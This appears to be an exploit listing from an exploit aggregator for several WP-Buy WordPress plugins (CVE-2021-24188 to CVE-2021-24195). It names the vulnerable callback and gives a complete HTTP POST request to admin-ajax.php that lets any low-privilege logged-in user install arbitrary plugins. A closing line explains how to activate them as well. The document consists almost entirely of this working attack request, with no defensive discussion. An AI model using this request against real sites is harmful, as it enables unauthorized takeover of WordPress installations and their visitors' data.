Exploit for Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User CVE-2021-24188 CVE-2021-24189 CVE-2021-24190 CVE-2021-24191 CVE-2021-24192 CVE-2021-24193 CVE-2021-24194 CVE-2021-24195

## https://sploitus.com/exploit?id=WPEX-ID:74889E29-5349-43D1-BAF5-1622493BE90C
Vulnerable code : 
 cp_plugins_do_button_job_later_callback() method in settings-start-index.php file

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: [Low Privilege User cookie]
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

action=do_button_job_later&slug=plugin_slug.version


To activate installed plugins, use the same request, but with the plugin_file instead of slug parameter